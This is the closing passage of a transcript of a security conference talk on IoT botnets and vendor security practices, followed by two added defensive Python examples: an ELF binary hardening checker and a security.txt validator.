all together, you have the baseline for what you need to actually have one, which is awesome. And so I did a quick question out there on Twitter, which you can see (I have a link here), and these are some community suggestions for what vendors can do: everything from automatic updates to, I like this one, make security a named person's problem. So, say, Sherry has to deal with the firmware bugs that come in, so talk to her if there's an issue. Other things like minimizing attack surfaces and code signing: a lot of this stuff is going to be part of other best practices that you're going to have to implement, but these are all elements of things that might be good for you to consider moving forward. Default settings definitely should be sane and with security in mind, and also don't reinvent the wheel.

So, final thoughts here; I've got just about two minutes left. We want to make it less easy for people to run botnets overall. The supply is already there, the demand is great, everything is set up; people can, off the shelf, get several thousand bots on a botnet in an afternoon. Botnet authors are definitely getting a lot smarter. People are using the messy landscape of this to take control of it, as you see with the Kaiji botnet, which is definitely a lot more advanced than previous stuff. People are going to be using this for more nefarious purposes, and because there's so much going on in the space, it's very hard to pick out who is either a nation state trying to get access into your router or just some random kid who has no idea what they're doing. And new devices and architectures are always being targeted; as I said, FPGAs. There's tons of new stuff; you can read that analysis that I wrote. If you don't act soon, the new products that you put out are already going to be dead on arrival and exploitable
once they come out.

So yeah, the Q&A for this is going to be done in the DEF CON Discord, as you might have seen in the Twitch chat, so if you have questions, or you can always hit me up on Twitter at @netspooky; my DMs are open there. I've got some shoutouts real quick. Shout out to the Safari Zone crew, which is the people that have always been there to look for weird stuff on the internet; hopefully we'll have a zine coming out soon. ThreatLand, everybody who helped out with that project to collect sources, and of course the entire community of flood crowd. Special shout out to Hermit for helping me go through so much of this and being such an awesome person for looking at logs and other weird stuff, and being able to tell me a lot of interesting things that she has found. Andrew Morris from GreyNoise, thanks so much for letting me use your data set too before it's even publicly available. Thanks to Mudge for coming in hot with some hot takes for me when I was building this talk. Check out Ilia's IoT Village talk on emulating IoT devices and malware, because we actually did a lot of that when I was writing this talk. And then thanks also to Dade for that theme song. So I'll have slides out, I'll tweet them out, just follow me on Twitter and you'll see. I have citations here if you want to read them. But yeah, thanks everybody.
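The binary-hardening mitigations that the vendor graph at the start of this section scores (stack guards, non-executable stack, RELRO, ASLR/PIE) can be checked on your own build output before it ships, which is the kind of step a security testing pipeline would automate. The following is an added example, not code from the talk or its slides: a small Python checker that reads the ELF program headers and dynamic section the way checksec-style tools do, plus a constructed minimal ELF64 image for exercising it offline. The constants and layouts follow the ELF specification; the stack-canary check is a string heuristic (a reference to `__stack_chk_fail` surviving in `.dynstr`) and so only applies to dynamically linked binaries. Running it with a file path as the argument checks that file; with no argument it checks the constructed sample.

```python
import struct
import sys

# ELF constants (values from the ELF specification / glibc elf.h).
ET_EXEC, ET_DYN = 2, 3
PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474E551, 0x6474E552
PF_X = 1
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 8, 1


def check_hardening(data):
    """Report NX, RELRO, PIE and stack-canary status of a 64-bit little-endian ELF image."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("only ELFCLASS64 little-endian files are handled here")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)

    gnu_stack_flags = None          # stays None when there is no PT_GNU_STACK header at all
    has_relro = has_dynamic = False
    dyn_tags = {}
    for i in range(e_phnum):
        p_type, p_flags, p_offset, _vaddr, _paddr, p_filesz = struct.unpack_from(
            "<IIQQQQ", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            gnu_stack_flags = p_flags
        elif p_type == PT_GNU_RELRO:
            has_relro = True
        elif p_type == PT_DYNAMIC:
            has_dynamic = True
            # Walk the dynamic section: (d_tag, d_val) pairs terminated by DT_NULL.
            off = p_offset
            while off + 16 <= p_offset + p_filesz:
                tag, val = struct.unpack_from("<qQ", data, off)
                if tag == DT_NULL:
                    break
                dyn_tags[tag] = val
                off += 16

    bind_now = bool(DT_BIND_NOW in dyn_tags
                    or dyn_tags.get(DT_FLAGS, 0) & DF_BIND_NOW
                    or dyn_tags.get(DT_FLAGS_1, 0) & DF_1_NOW)
    return {
        # Without a PT_GNU_STACK header the loader falls back to an executable stack,
        # so "missing" is reported the same as "executable".
        "nx": gnu_stack_flags is not None and not (gnu_stack_flags & PF_X),
        # RELRO is only "full" when the GOT is also bound at load time (BIND_NOW).
        "relro": "full" if has_relro and bind_now else "partial" if has_relro else "none",
        # A position-independent executable is ET_DYN with a dynamic section
        # (a shared library looks the same; the caller knows which one it passed).
        "pie": e_type == ET_DYN and has_dynamic,
        # Heuristic: canary-protected, dynamically linked binaries reference
        # __stack_chk_fail, and the name survives in .dynstr after stripping.
        "canary": b"__stack_chk_fail" in data,
    }


def build_sample_elf(nx=True, relro=True, bind_now=True, pie=True, canary=True):
    """Constructed sample input: a minimal, non-loadable ELF64 image that carries only
    the headers check_hardening() reads. Flags choose which mitigations it claims."""
    dyn = struct.pack("<qQ", DT_FLAGS, DF_BIND_NOW) if bind_now else b""
    dyn += struct.pack("<qQ", DT_NULL, 0)
    phnum = 3
    dyn_off = 64 + 56 * phnum                      # right after ehdr + program headers
    headers = [
        (PT_DYNAMIC, 6, dyn_off, len(dyn)),
        (PT_GNU_STACK, 6 | (0 if nx else PF_X), 0, 0),
        (PT_GNU_RELRO if relro else 0, 4, 0, 0),   # type 0 (PT_NULL) stands in when RELRO is absent
    ]
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)   # ELFCLASS64, little-endian, version 1
    ehdr = struct.pack("<16sHHIQQQIHHHHHH", ident, ET_DYN if pie else ET_EXEC, 62, 1,
                       0, 64, 0, 0, 64, 56, phnum, 64, 0, 0)
    phdrs = b"".join(struct.pack("<IIQQQQQQ", t, f, off, 0, 0, sz, sz, 8)
                     for t, f, off, sz in headers)
    tail = b"__stack_chk_fail\0" if canary else b""
    return ehdr + phdrs + dyn + tail


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    image = open(path, "rb").read() if path else build_sample_elf()
    for name, status in check_hardening(image).items():
        print(f"{name:7} {status}")
```

Wiring this into a build so that a binary reporting `nx` false or `relro` "none" fails the pipeline is the cheap version of the "security testing pipeline" the talk asks vendors for; the same headers exist on 32-bit and big-endian images, only the struct layouts differ.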
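The talk points vendors at security.txt as the easy way to publish a security contact. As an added example that is not from the talk, here is a parser and validator for that file as specified in RFC 9116, with constructed sample files (example.com is a placeholder domain): one acceptable file, and one showing the two most common mistakes, a bare e-mail address where a `mailto:` URI is required and a missing `Expires` line. `REFERENCE_TIME` is pinned to mid-2020, the talk's timeframe, so the samples evaluate the same way whenever this is run; pass nothing for `now` to check against the real clock.

```python
from datetime import datetime, timezone

# Field rules from RFC 9116 (security.txt): Contact and Expires are mandatory,
# Expires and Preferred-Languages may appear at most once, Contact values are URIs.
REQUIRED = ("contact", "expires")
SINGLE_VALUED = ("expires", "preferred-languages")
CONTACT_SCHEMES = ("mailto:", "https://", "tel:")

# Pinned "now" so the constructed samples below evaluate consistently.
REFERENCE_TIME = datetime(2020, 8, 1, tzinfo=timezone.utc)


def parse_security_txt(text):
    """Parse 'Field: value' lines into {lowercased field: [values]}; '#' lines are comments."""
    fields = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if ":" not in line:
            raise ValueError(f"line {lineno}: expected 'Field: value', got {line!r}")
        name, value = line.split(":", 1)
        fields.setdefault(name.strip().lower(), []).append(value.strip())
    return fields


def validate_security_txt(fields, now=None):
    """Return a list of problems; an empty list means the file is acceptable."""
    now = now or datetime.now(timezone.utc)
    problems = []
    for name in REQUIRED:
        if name not in fields:
            problems.append(f"missing required field {name}")
    for name in SINGLE_VALUED:
        if len(fields.get(name, [])) > 1:
            problems.append(f"{name} must appear only once")
    for contact in fields.get("contact", []):
        if not contact.lower().startswith(CONTACT_SCHEMES):
            problems.append(f"Contact must be a URI (mailto:, https://, tel:), got {contact!r}")
    if "expires" in fields:
        # RFC 9116 timestamps are ISO 8601 / RFC 3339; older Pythons reject a bare 'Z'.
        try:
            expires = datetime.fromisoformat(fields["expires"][0].replace("Z", "+00:00"))
        except ValueError:
            problems.append("Expires is not an ISO 8601 timestamp")
        else:
            if expires.tzinfo is None:
                problems.append("Expires must include a timezone offset")
            elif expires <= now:
                problems.append("file has expired; researchers should not trust its contacts")
            elif (expires - now).days > 365:
                problems.append("Expires is more than a year away (RFC 9116 recommends less)")
    return problems


# Constructed sample for a hypothetical vendor; example.com is a placeholder domain.
GOOD_SAMPLE = """\
# Served at https://example.com/.well-known/security.txt
Contact: mailto:security@example.com
Contact: https://example.com/security/report
Expires: 2021-01-01T00:00:00Z
Encryption: https://example.com/pgp-key.txt
Policy: https://example.com/security/disclosure-policy
Preferred-Languages: en
"""

# Constructed sample with the usual mistakes: bare address, no Expires.
BAD_SAMPLE = """\
Contact: security@example.com
Policy: https://example.com/security/disclosure-policy
"""

if __name__ == "__main__":
    for sample in (GOOD_SAMPLE, BAD_SAMPLE):
        print(validate_security_txt(parse_security_txt(sample), now=REFERENCE_TIME) or "ok")
```

The file belongs at `/.well-known/security.txt` on the vendor's HTTPS site; the `Expires` check matters because a stale file sends researchers to a mailbox nobody reads, which is exactly the "chasing the vendor on Twitter" situation the talk describes.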